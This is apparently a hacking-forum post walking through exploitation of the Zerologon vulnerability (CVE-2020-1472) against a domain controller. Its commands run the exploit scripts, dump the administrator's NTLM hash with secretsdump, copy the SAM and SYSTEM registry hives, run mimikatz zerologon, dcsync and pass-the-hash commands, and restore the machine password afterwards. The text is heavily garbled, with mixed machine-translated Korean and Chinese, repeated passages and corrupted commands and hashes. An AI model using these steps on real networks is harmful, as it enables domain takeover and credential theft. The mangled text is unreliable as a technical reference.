KoreanHackerTeam
Moderator
CVE-2020-1472
이 기사는 다른 방법을 복원 할 수없는 상황에 적용되는 방법을 언급합니다.
脱域后,可以使用powershell来强制同步,一次性重置计算机的机器帐户密码。(包括AD,注册表,lsass里面的密码)。1Powershell Reset-ComputermachinePassword
1python3 set_empty_pw.py lx-dc01 192.168.1.4
th /user3:ADMINISTORTOR /DOMANICINCINITMMINIDMINGOUGS /ntlm:BE833AC3F39C0F843B1B653D37C34DBENET 사용 \\ \ 192.168.1.4Copy \\ 192.168.1.4 \ c $ \ system.savec3360 \ System.SaveCopy \\ 192.168.1.4 \ c $ \ sam.savec: \ sam.savecopy \\ 192.168.1.4 \ c $ \ security.save c: \ security.save :0101010123del /f system.savedel /f sam.savedel /f saved /f 1python3 secretsdump.py -sam sam.save -save system.save -security security.save local
https://github.com/mstxq17/cve-2020-1472- RestorePassword.py
1python3 restorepassword.py aaaaa.com/lx-dc01@lx-dc01 -target-ip 192.168.1.4 -hexpass 87E2812CEA41210C80E298C9E2A43A249D6A40560277777774340FBFD4B5F969563803B0F1BAE7CD24B29B41AE611025F19527356D73E0F89352D 73E0F89356D 38B3361332B35DD5EE22785B79B922149DB32DC5C9301F4FD9FD090F532575BF5197A9C9230955BFD96AB928AE66B3999730C75B85B855E2670816FER F2DBF9DBB1943211A912224C4C618507F7091AE09435A13A04BAD5F056E72D34A96F67FA33D50E7596ECA7709F398D98D98BA9407D7B937E40D1 BF5FF0EB2240BDF0E8287E26EA5F8E69219FA7B1C5AA0E0E0BD8B992A176C32B0EFB914FA6C1E53D69179110B02DFC1B1B1B1B1B1B1B1B1B1B1B445B92584420960不建议使用:더 폭력적이며 다시 부를 것입니다. 비밀번호를 계산할 때 빈 암호의 해시를 사용하여 Session_key를 계산했습니다.
https://github.com/risksense/zerologon- reinstall_original_pw.py
1python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
th /user:Administrator /domain333:AAAAA /NTLM:BE833AC3F39C0F843B1B653D37C34DBE ''EXIT12Privilege
ebugseKurlSA3333333TH /USER:ADMINISTRARTR /DOMAIN3333:AAAAAA /ntlm:BE833AC3F39C0F843B1B653D37C34DBE
이 기사는 다른 방법을 복원 할 수없는 상황에 적용되는 방법을 언급합니다.
脱域后,可以使用powershell来强制同步,一次性重置计算机的机器帐户密码。(包括AD,注册表,lsass里面的密码)。1Powershell Reset-ComputermachinePassword
环境
12 도메인 : AAAA.comDC : LX-DC01.AAAA.com -IP- 192.168.1.4python版本
poc
1python3 Zerologon_tester.py lx-dc01 192.168.1.4安装impacket
12git 클론 https://github.com/secureauthcorp/impacket.gitcd Impacket Pip3 설치.exploit
https://github.com/risksense/zerologon- set_empty_pw.py1python3 set_empty_pw.py lx-dc01 192.168.1.4
获取域管administrator的hash
1python3 secretsdump.py aaaa.com/lx-dc01\[email protected] -no-pass通过wmiexec使用 “administrator”的hash获取域管权限
1python3 wmiexec.py -hash.BE833AC3F39C0F843B1B653D37C34DBBE AAAA.com/[email protected]获取目标原始hash
123REG 저장 HKLM \ System System.Savereg HKLM \ SAM SAM.SAVEREG HKLM \ SAVE SECURITY. System.Saveget Sam.saveget Security.save坑点:这一步有可能python出现编码错误导致不能下载1234 다른 언어의 인코딩은 다릅니다. 먼저 다음 언어를 얻은 다음 해당 인코딩 https://docs.python.org/3/library/codecs.html을 검색 할 수 있습니다. 인코딩 Python3 wmiexec.py -hashes :BE833AC3F39C0F843B1B653D34DBE. aaaa.com/[email protected] -Codec GB2312也可使用net use将文件copy回来1234567Mimi Inject Hash to CmdPrivilege33333:debugsekurlsath /user3:ADMINISTORTOR /DOMANICINCINITMMINIDMINGOUGS /ntlm:BE833AC3F39C0F843B1B653D37C34DBENET 사용 \\ \ 192.168.1.4Copy \\ 192.168.1.4 \ c $ \ system.savec3360 \ System.SaveCopy \\ 192.168.1.4 \ c $ \ sam.savec: \ sam.savecopy \\ 192.168.1.4 \ c $ \ security.save c: \ security.save :0101010123del /f system.savedel /f sam.savedel /f saved /f 1python3 secretsdump.py -sam sam.save -save system.save -security security.save local将导出的hash文件下载到本地
建议使用:스크립트에는 xxx 패키지가없고 오류가 발생할 수 있습니다. 나는 아직 그 이유를 알아 내지 않았다https://github.com/mstxq17/cve-2020-1472- RestorePassword.py
1python3 restorepassword.py aaaaa.com/lx-dc01@lx-dc01 -target-ip 192.168.1.4 -hexpass 87E2812CEA41210C80E298C9E2A43A249D6A40560277777774340FBFD4B5F969563803B0F1BAE7CD24B29B41AE611025F19527356D73E0F89352D 73E0F89356D 38B3361332B35DD5EE22785B79B922149DB32DC5C9301F4FD9FD090F532575BF5197A9C9230955BFD96AB928AE66B3999730C75B85B855E2670816FER F2DBF9DBB1943211A912224C4C618507F7091AE09435A13A04BAD5F056E72D34A96F67FA33D50E7596ECA7709F398D98D98BA9407D7B937E40D1 BF5FF0EB2240BDF0E8287E26EA5F8E69219FA7B1C5AA0E0E0BD8B992A176C32B0EFB914FA6C1E53D69179110B02DFC1B1B1B1B1B1B1B1B1B1B1B445B92584420960不建议使用:더 폭력적이며 다시 부를 것입니다. 비밀번호를 계산할 때 빈 암호의 해시를 사용하여 Session_key를 계산했습니다.
https://github.com/risksense/zerologon- reinstall_original_pw.py
1python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
在域控主机上删除导出的hash文件。
使用secretsdump读取下载到本地的hash文件,获取域控机器账户置空前的原始hash
1shell C:\Intel\mimikatz.exe 'lsadump:zerologon /target:192.168.1.4 /Account:LX-DC01 $ ''EXIT'1LSADUMBUM:ZEROLORONORONORON /TARGET333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333:LX-DC01 1SHELL C: \ Intel \ Mimikatz.exe 'lsadump:zerologon /target:lx-dc01.aaaa.com /account:lx-dc01 $ /익스플로잇' 'exit'1lsadump33333333333333333:zerologon /target:lx-dc01 $ /excoit 333010101010110101010101101010101011010101010101011010101011010101010110101011010101101011010110101101101101101까지 C: \ Intel \ Mimikatz.exe 'lsadump33333:dcsync /domnain3333333333333333333333333333333333333333333333:lx-dc01.aaa.com /user:administrator /authuser:lx-dc01 $ /augdomain: /authpassword: /authntlm ''exit'1lsadumb33333:dcsync /domnain33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333:lx-dc01.aaa.com /user:AdminMinistrator /authuser:lx-dc01 $ /authdomain3:AAA /authpassword: /authntlm密码恢复
1 쉘 C: \ Intel \ Mimikatz.exe '권한 3:debug' 'sekurlsa3th /user:Administrator /domain333:AAAAA /NTLM:BE833AC3F39C0F843B1B653D37C34DBE ''EXIT12PrivilegeebugseKurlSA3333333TH /USER:ADMINISTRARTR /DOMAIN3333:AAAAAA /ntlm:BE833AC3F39C0F843B1B653D37C34DBE